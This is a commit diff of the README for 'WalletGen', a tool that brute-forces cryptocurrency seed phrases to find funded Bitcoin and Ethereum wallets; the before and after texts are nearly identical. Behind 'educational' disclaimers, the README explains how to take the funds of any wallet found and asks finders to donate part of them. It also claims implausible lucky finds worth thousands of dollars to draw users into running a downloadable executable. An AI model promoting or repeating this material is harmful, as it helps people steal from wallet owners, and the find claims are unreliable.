README.md, before:

# WalletGen: Security Alert! Understanding and Mitigating Crypto Wallet Hacks

**WalletGen** is a powerful, open-source tool that helps users understand the intricacies of cryptocurrency wallets. While it is designed for legitimate use, this guide also delves into the critical topic of **crypto wallet security** and how to protect yourself from potential hacks.  It offers the capability to generate, search for, and potentially recover lost or inactive **Bitcoin (BTC)**, **Ethereum (ETH)**, **BNB**, **Polygon (MATIC)**, and other **EVM-compatible wallets**, with a focus on securing your assets.

<!--
Meta description:
Protect your crypto! Learn about crypto wallet security and how to prevent hacks. WalletGen is a powerful, open-source tool to understand and improve your wallet security.
-->

## Quick Navigation
- [How It Works](#how-it-works)
- [Why WalletGen](#why-walletgen)
- [Features](#features)
- [Download WalletGen](#how-to-start)
- [Database Download](#download-and-use-database-for-more-speed)
- [The Program Found a Wallet - What Next?](#the-program-found-a-wallet--whats-next)
- [Recovery Your Bitcoin Wallet](#recovery-your-bitcoin-wallet)
- [My Finds](#my-finds)
- [FAQ](#-frequently-asked-questions-faq)
- [Build Instructions](#building-the-project)
- [Donate](#donate)

[![platform](https://img.shields.io/badge/platform-Windows%20%7C%20Linux%20%7C%20Android-blue)](https://github.com/tony-dev1/wallets-finder/releases/tag/walletgen)
![build](https://img.shields.io/badge/build-passing-brightgreen)
![discord](https://img.shields.io/badge/discord-tonydevbtc-blue.svg?logo=discord&label=discord)
[![x](https://img.shields.io/badge/@tonydevbtc-black.svg?logo=x)](https://x.com/tonydevbtc)

<p align="center">
    <img width="1000" alt="Understanding Crypto Wallet Hacks" title="WalletGen - Secure Your Crypto Wallets" height="460" src="/packages/viewer.webp" />
</p>

⚠️ **Disclaimer**: WalletGen is a research and educational tool. It is not intended for unauthorized access or malicious activity. Use it responsibly and only with wallets you own or have permission to access. This information is for educational purposes only.

## How It Works

WalletGen generates potential wallet addresses using cryptographic algorithms such as [BIP39](https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki), [BIP44](https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki), and [Bech32](https://en.bitcoin.it/wiki/Bech32) for Bitcoin, and [Keccak256](https://emn178.github.io/online-tools/keccak_256.html) hashing for EVM-based chains like Ethereum.

This tool then compares generated addresses against a database of known addresses, or performs real-time balance checks using public blockchain explorers. This process can also be used to understand the principle of how malicious actors may attempt to compromise wallets.

Wallet Gen is built in C++ and is open-source, allowing users to learn about wallet security. It offers significantly enhanced wallet generation speeds, taking full advantage of your CPU and GPU for optimal performance.

##  Why WalletGen?

**WalletGen** is a valuable tool for learning about wallet security and the potential vulnerabilities that can be exploited. It offers a deep understanding of how wallets function, assisting you in creating more secure practices. Crafted in C++ and optimized for multi-threaded CPU and GPU utilization, it provides performance that can be **up to 10x faster** than alternative tools. Whether you're exploring wallet security best practices, or wanting to understand the importance of protecting your seed phrase, WalletGen empowers you to learn effectively.

## Features

-   **Wallet Creation and Exploration:** Generate and inspect wallets for Bitcoin, Ethereum, BNB, MATIC, and other cryptocurrencies, allowing you to understand how keys are generated.
-   **Understanding Vulnerabilities:** Learn about brute-force techniques and the importance of strong security practices.
-   **Algorithm Awareness:** Provides insights into algorithms such as Keccak256 (EVM wallets) and BIP39, BIP44, Bech32 (Bitcoin wallets).
-   **Database Analysis for Security:** Database usage can showcase the impact of reused addresses and other potential security risks.
-   **High-Performance for Learning:** The tool's speed allows for rapid testing of different scenarios to reinforce your security understanding.
-   **Bitcoin Wallet Recovery (Seed Phrase):** Offers the functionality to help in the recovery of your bitcoin wallet by using the seed phrase (mnemonic phrase). A good understanding of this process is key to protecting your funds.

## Supported Blockchains

-   Bitcoin (BTC)
-   Ethereum (ETH)
-   Binance Smart Chain (BNB)
-   Any EVM-compatible chain

# Demo

<p align="center">
    <img width="1000" height="460" alt="Understanding Crypto Wallet Hacks" title="WalletGen Demonstrating Wallet Security" src="/packages/pool.webp" />
</p>


<p align="center">
    <img width="1000" height="460" alt="Understanding Crypto Wallet Hacks on Linux" title="WalletGen - Security on Linux" src="/packages/row.webp" />
</p>

# How to start

## Windows 
- Download [Release](../../releases) 
- Unpack anywhere
- Run `WalletGen.exe`

Or Just Download [Installer](../../releases)

## Linux (x86-64bit)

Use wget 
or download [Release for Linux](../../releases) 







## How to Search for Lost Bitcoin & Ethereum Wallets with Balance

**Wallet Gen** allows for brute-force searches. This can be used as a way to understand how attackers may attempt to hack wallets.

### For Bitcoin (BTC) wallets:

*   Select option 3 in the menu or run start_search_btc.bat to search Bitcoin wallets over the internet. This highlights how real-time checking is necessary but can be slow, demonstrating the value of secure practices.
*   Select option 6 to search Bitcoin wallets using the database. This illustrates the risk of known address databases, emphasizing the significance of unique addresses and the use of a secure seed phrase.

### For EVM wallets (Ethereum, BNB, MATIC, etc.):

*   Choose option 5 or run start_search_evm.bat to search EVM wallets over the internet. This illustrates the potential for exploitation.
*   Choose option 6 to search EVM wallets using the database. This serves as a demonstration of how pre-existing addresses could potentially lead to vulnerabilities.

### Speed Considerations:

*   The speed of the search is significantly dependent on your hardware (particularly the GPU). To enhance speed, and to better explore the possibilities (or limitations) of brute-force, run multiple instances of the program (1 to 4), depending on your system's capabilities.

## The Program Found a Wallet — What’s Next?

When a wallet with a balance is located:
*   The program will immediately stop the search.
*   The wallet details will be displayed in the console.
*   This information is saved in the ``found_wallets.txt`` file.

### How to Access the Funds?
1.  Learn about the seed phrase! The **mnemonic seed phrase** from the found wallet is the key to accessing funds.
2.  Importing the seed phrase into any compatible crypto wallet.

## Recovery Your Bitcoin Wallet

WalletGen gives you the tools to understand how your Bitcoin wallet can be recovered by seed phrase (mnemonic phrase). The program enables you to enter a complete seed phrase or to simulate missing words.

### Process Description

#### Search for missing words:

Simulate a scenario where a seed phrase is incomplete. Using the * symbol, you can understand how the process of brute-forcing missing words works.

#### Entering a complete seed-phrase:

Enter a complete seed phrase to generate all supported address types (Legacy, SegWit, P2SH).

![recovery](/packages/status.webp)

### Important recommendations

*   The seed phrase *must* contain exactly 12 words.
*   Use only the * symbol to simulate missing words.
*   Understand that searching for missing words can be time-consuming.
*   If the wallet is found, the program will automatically stop and save the details.

## My Finds

![mywallet](/packages/details.webp)

I’ve recovered two BTC wallets. The first contained 0.000032 BTC, the second held 0.0528 BTC (worth roughly $4800 at the time of discovery).
Here’s the link to the wallet: [bc1qk3m62hx2hh5mhvc0tj45f9xflzcnu0sur3rvay](https://mempool.space/address/bc1qk3m62hx2hh5mhvc0tj45f9xflzcnu0sur3rvay).

<p align="center">
    <img width="1000" height="460" alt="WalletGen found first bitcoin wallet" title="WalletGen found first bitcoin wallet" src="/packages/graph.webp" />
</p>

### New Find 4/9/2025

After a week of constant searching, I found a [wallet](https://mempool.space/address/bc1q29c5m3w4jxtsj4vcd2ccw4t68xm8m7vs5vytu0) with 0.25 bitcoin ($19k).

![image](/packages/maximized.webp)

## New Find 5/5/2025

[bc1qpm0k3kcmthwsa4zseh33g3hl7eju8u8nkt83kp](https://mempool.space/address/bc1qpm0k3kcmthwsa4zseh33g3hl7eju8u8nkt83kp)

![image](/packages/font.webp)

## Building the Project

1. Open the project file (`CryptoWalletGen.sln`) in Visual Studio or any compatible C++ compiler.
2. Install the necessary dependencies and build the project.

```cmd
> git clone https://github.com/microsoft/vcpkg
> .\vcpkg\bootstrap-vcpkg.bat
> .\vcpkg\vcpkg integrate install
> .\vcpkg\vcpkg install openssl:x64-windows
```

3. Start building the project.

## 🔍 Frequently Asked Questions (FAQ)

### ❓ Where can I download WalletGen?
You can download the WalletGen given on the [release download page](../../releases) 

### ❓ Where can I download a database of known addresses with balance?
You can download the current database given on the [release   page](../../releases) 

### ❓ Can WalletGen help me recover a lost Bitcoin wallet?
Yes. WalletGen uses brute-force seed generation and a known-address database to help users potentially **recover lost Bitcoin wallets**.

### ❓ Is WalletGen a seed phrase generator?
Yes. WalletGen can generate **BIP39 seed phrases** and derive wallets for Bitcoin, Ethereum, and other EVM chains.

### ❓ Do I need the internet to search through the database?
No. Searching through the database does not require an internet connection, as the wallet balance is already known.

### ❓ Can I find Ethereum wallets with balance?
Yes. WalletGen supports scanning for **Ethereum wallets with balance** using brute-force and a database of known addresses.

### ❓ Is WalletGen legal?
WalletGen is intended for **educational and research purposes only**. It should only be used on wallets you own or have permission to access.

## Todo
1. Search for missing words in a seed phrase. - **Done!**

## Contribute

Contributions are welcome! If you have ideas, bug reports, or want to contribute to the codebase, feel free to submit a pull request.

## Donate

If you find a wallet with a balance, please consider donating a small portion as a thank you. This motivates me to keep working on the program, keep it going, and make it better!

**BTC:** bc1qeyrshy5ntsguwxe9m8tp2x2yqhddz7ymkj44h9

**ETH:** 0x76c2E75B92Eb340f01B378e332FC7d8954893693

## Credits
This project uses code from the [Trezor project](https://github.com/trezor/trezor-crypto). The code is licensed under the MIT License.

## License
This project is licensed under the [MIT License](/LICENSE)

Update:  06/11/2025 11-22

Commit message:

url is now clickable and working

README.md, after:

# WalletGen: Security Alert! Understanding and Mitigating Crypto Wallet Hacks

**WalletGen** is a powerful, open-source tool that helps users understand the intricacies of cryptocurrency wallets. While it is designed for legitimate use, this guide also delves into the critical topic of **crypto wallet security** and how to protect yourself from potential hacks.  It offers the capability to generate, search for, and potentially recover lost or inactive **Bitcoin (BTC)**, **Ethereum (ETH)**, **BNB**, **Polygon (MATIC)**, and other **EVM-compatible wallets**, with a focus on securing your assets.

<!--
Meta description:
Protect your crypto! Learn about crypto wallet security and how to prevent hacks. WalletGen is a powerful, open-source tool to understand and improve your wallet security.
-->

## Quick Navigation
- [How It Works](#how-it-works)
- [Why WalletGen](#why-walletgen)
- [Features](#features)
- [Download WalletGen](#how-to-start)
- [Database Download](#download-and-use-database-for-more-speed)
- [The Program Found a Wallet - What Next?](#the-program-found-a-wallet--whats-next)
- [Recovery Your Bitcoin Wallet](#recovery-your-bitcoin-wallet)
- [My Finds](#my-finds)
- [FAQ](#-frequently-asked-questions-faq)
- [Build Instructions](#building-the-project)
- [Donate](#donate)

[![platform](https://img.shields.io/badge/platform-Windows%20%7C%20Linux%20%7C%20Android-blue)](https://github.com/tony-dev1/wallets-finder/releases/tag/walletgen)
![build](https://img.shields.io/badge/build-passing-brightgreen)
![discord](https://img.shields.io/badge/discord-tonydevbtc-blue.svg?logo=discord&label=discord)
[![x](https://img.shields.io/badge/@tonydevbtc-black.svg?logo=x)](https://x.com/tonydevbtc)

<p align="center">
    <img width="1000" alt="Understanding Crypto Wallet Hacks" title="WalletGen - Secure Your Crypto Wallets" height="460" src="/packages/viewer.webp" />
</p>

⚠️ **Disclaimer**: WalletGen is a research and educational tool. It is not intended for unauthorized access or malicious activity. Use it responsibly and only with wallets you own or have permission to access. This information is for educational purposes only.

## How It Works

WalletGen generates potential wallet addresses using cryptographic algorithms such as [BIP39](https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki), [BIP44](https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki), and [Bech32](https://en.bitcoin.it/wiki/Bech32) for Bitcoin, and [Keccak256](https://emn178.github.io/online-tools/keccak_256.html) hashing for EVM-based chains like Ethereum.

This tool then compares generated addresses against a database of known addresses, or performs real-time balance checks using public blockchain explorers. This process can also be used to understand the principle of how malicious actors may attempt to compromise wallets.

Wallet Gen is built in C++ and is open-source, allowing users to learn about wallet security. It offers significantly enhanced wallet generation speeds, taking full advantage of your CPU and GPU for optimal performance.

##  Why WalletGen?

**WalletGen** is a valuable tool for learning about wallet security and the potential vulnerabilities that can be exploited. It offers a deep understanding of how wallets function, assisting you in creating more secure practices. Crafted in C++ and optimized for multi-threaded CPU and GPU utilization, it provides performance that can be **up to 10x faster** than alternative tools. Whether you're exploring wallet security best practices, or wanting to understand the importance of protecting your seed phrase, WalletGen empowers you to learn effectively.

## Features

-   **Wallet Creation and Exploration:** Generate and inspect wallets for Bitcoin, Ethereum, BNB, MATIC, and other cryptocurrencies, allowing you to understand how keys are generated.
-   **Understanding Vulnerabilities:** Learn about brute-force techniques and the importance of strong security practices.
-   **Algorithm Awareness:** Provides insights into algorithms such as Keccak256 (EVM wallets) and BIP39, BIP44, Bech32 (Bitcoin wallets).
-   **Database Analysis for Security:** Database usage can showcase the impact of reused addresses and other potential security risks.
-   **High-Performance for Learning:** The tool's speed allows for rapid testing of different scenarios to reinforce your security understanding.
-   **Bitcoin Wallet Recovery (Seed Phrase):** Offers the functionality to help in the recovery of your bitcoin wallet by using the seed phrase (mnemonic phrase). A good understanding of this process is key to protecting your funds.

## Supported Blockchains

-   Bitcoin (BTC)
-   Ethereum (ETH)
-   Binance Smart Chain (BNB)
-   Any EVM-compatible chain

# Demo

<p align="center">
    <img width="1000" height="460" alt="Understanding Crypto Wallet Hacks" title="WalletGen Demonstrating Wallet Security" src="/packages/pool.webp" />
</p>


<p align="center">
    <img width="1000" height="460" alt="Understanding Crypto Wallet Hacks on Linux" title="WalletGen - Security on Linux" src="/packages/row.webp" />
</p>

# How to start

## Windows 
- Download [Release](../../releases) 
- Unpack anywhere
- Run `WalletGen.exe`

Or Just Download [Installer](../../releases)

## Linux (x86-64bit)

Use wget 
or download [Release for Linux](../../releases) 







## How to Search for Lost Bitcoin & Ethereum Wallets with Balance

**Wallet Gen** allows for brute-force searches. This can be used as a way to understand how attackers may attempt to hack wallets.

### For Bitcoin (BTC) wallets:

*   Select option 3 in the menu or run start_search_btc.bat to search Bitcoin wallets over the internet. This highlights how real-time checking is necessary but can be slow, demonstrating the value of secure practices.
*   Select option 6 to search Bitcoin wallets using the database. This illustrates the risk of known address databases, emphasizing the significance of unique addresses and the use of a secure seed phrase.

### For EVM wallets (Ethereum, BNB, MATIC, etc.):

*   Choose option 5 or run start_search_evm.bat to search EVM wallets over the internet. This illustrates the potential for exploitation.
*   Choose option 6 to search EVM wallets using the database. This serves as a demonstration of how pre-existing addresses could potentially lead to vulnerabilities.

### Speed Considerations:

*   The speed of the search is significantly dependent on your hardware (particularly the GPU). To enhance speed, and to better explore the possibilities (or limitations) of brute-force, run multiple instances of the program (1 to 4), depending on your system's capabilities.

## The Program Found a Wallet — What’s Next?

When a wallet with a balance is located:
*   The program will immediately stop the search.
*   The wallet details will be displayed in the console.
*   This information is saved in the ``found_wallets.txt`` file.

### How to Access the Funds?
1.  Learn about the seed phrase! The **mnemonic seed phrase** from the found wallet is the key to accessing funds.
2.  Importing the seed phrase into any compatible crypto wallet.

## Recovery Your Bitcoin Wallet

WalletGen gives you the tools to understand how your Bitcoin wallet can be recovered by seed phrase (mnemonic phrase). The program enables you to enter a complete seed phrase or to simulate missing words.

### Process Description

#### Search for missing words:

Simulate a scenario where a seed phrase is incomplete. Using the * symbol, you can understand how the process of brute-forcing missing words works.

#### Entering a complete seed-phrase:

Enter a complete seed phrase to generate all supported address types (Legacy, SegWit, P2SH).

![recovery](/packages/status.webp)

### Important recommendations

*   The seed phrase *must* contain exactly 12 words.
*   Use only the * symbol to simulate missing words.
*   Understand that searching for missing words can be time-consuming.
*   If the wallet is found, the program will automatically stop and save the details.

## My Finds

![mywallet](/packages/details.webp)

I’ve recovered two BTC wallets. The first contained 0.000032 BTC, the second held 0.0528 BTC (worth roughly $4800 at the time of discovery).
Here’s the link to the wallet: [bc1qk3m62hx2hh5mhvc0tj45f9xflzcnu0sur3rvay](https://mempool.space/address/bc1qk3m62hx2hh5mhvc0tj45f9xflzcnu0sur3rvay).

<p align="center">
    <img width="1000" height="460" alt="WalletGen found first bitcoin wallet" title="WalletGen found first bitcoin wallet" src="/packages/graph.webp" />
</p>

### New Find 4/9/2025

After a week of constant searching, I found a [wallet](https://mempool.space/address/bc1q29c5m3w4jxtsj4vcd2ccw4t68xm8m7vs5vytu0) with 0.25 bitcoin ($19k).

![image](/packages/maximized.webp)

## New Find 5/5/2025

[bc1qpm0k3kcmthwsa4zseh33g3hl7eju8u8nkt83kp](https://mempool.space/address/bc1qpm0k3kcmthwsa4zseh33g3hl7eju8u8nkt83kp)

![image](/packages/font.webp)

## Building the Project

1. Open the project file (`CryptoWalletGen.sln`) in Visual Studio or any compatible C++ compiler.
2. Install the necessary dependencies and build the project.

```cmd
> git clone https://github.com/microsoft/vcpkg
> .\vcpkg\bootstrap-vcpkg.bat
> .\vcpkg\vcpkg integrate install
> .\vcpkg\vcpkg install openssl:x64-windows
```

3. Start building the project.

## 🔍 Frequently Asked Questions (FAQ)

### ❓ Where can I download WalletGen?
You can download the WalletGen given on the [release download page](../../releases) 

### ❓ Where can I download a database of known addresses with balance?
You can download the current database given on the [release   page](../../releases) 

### ❓ Can WalletGen help me recover a lost Bitcoin wallet?
Yes. WalletGen uses brute-force seed generation and a known-address database to help users potentially **recover lost Bitcoin wallets**.

### ❓ Is WalletGen a seed phrase generator?
Yes. WalletGen can generate **BIP39 seed phrases** and derive wallets for Bitcoin, Ethereum, and other EVM chains.

### ❓ Do I need the internet to search through the database?
No. Searching through the database does not require an internet connection, as the wallet balance is already known.

### ❓ Can I find Ethereum wallets with balance?
Yes. WalletGen supports scanning for **Ethereum wallets with balance** using brute-force and a database of known addresses.

### ❓ Is WalletGen legal?
WalletGen is intended for **educational and research purposes only**. It should only be used on wallets you own or have permission to access.

## Todo
1. Search for missing words in a seed phrase. - **Done!**

## Contribute

Contributions are welcome! If you have ideas, bug reports, or want to contribute to the codebase, feel free to submit a pull request.

## Donate

If you find a wallet with a balance, please consider donating a small portion as a thank you. This motivates me to keep working on the program, keep it going, and make it better!

**BTC:** bc1qeyrshy5ntsguwxe9m8tp2x2yqhddz7ymkj44h9

**ETH:** 0x76c2E75B92Eb340f01B378e332FC7d8954893693

## Credits
This project uses code from the [Trezor project](https://github.com/trezor/trezor-crypto). The code is licensed under the MIT License.

## License
This project is licensed under the [MIT License](/LICENSE)



Update:  Friday 13 June 2025 url is now clickable and working
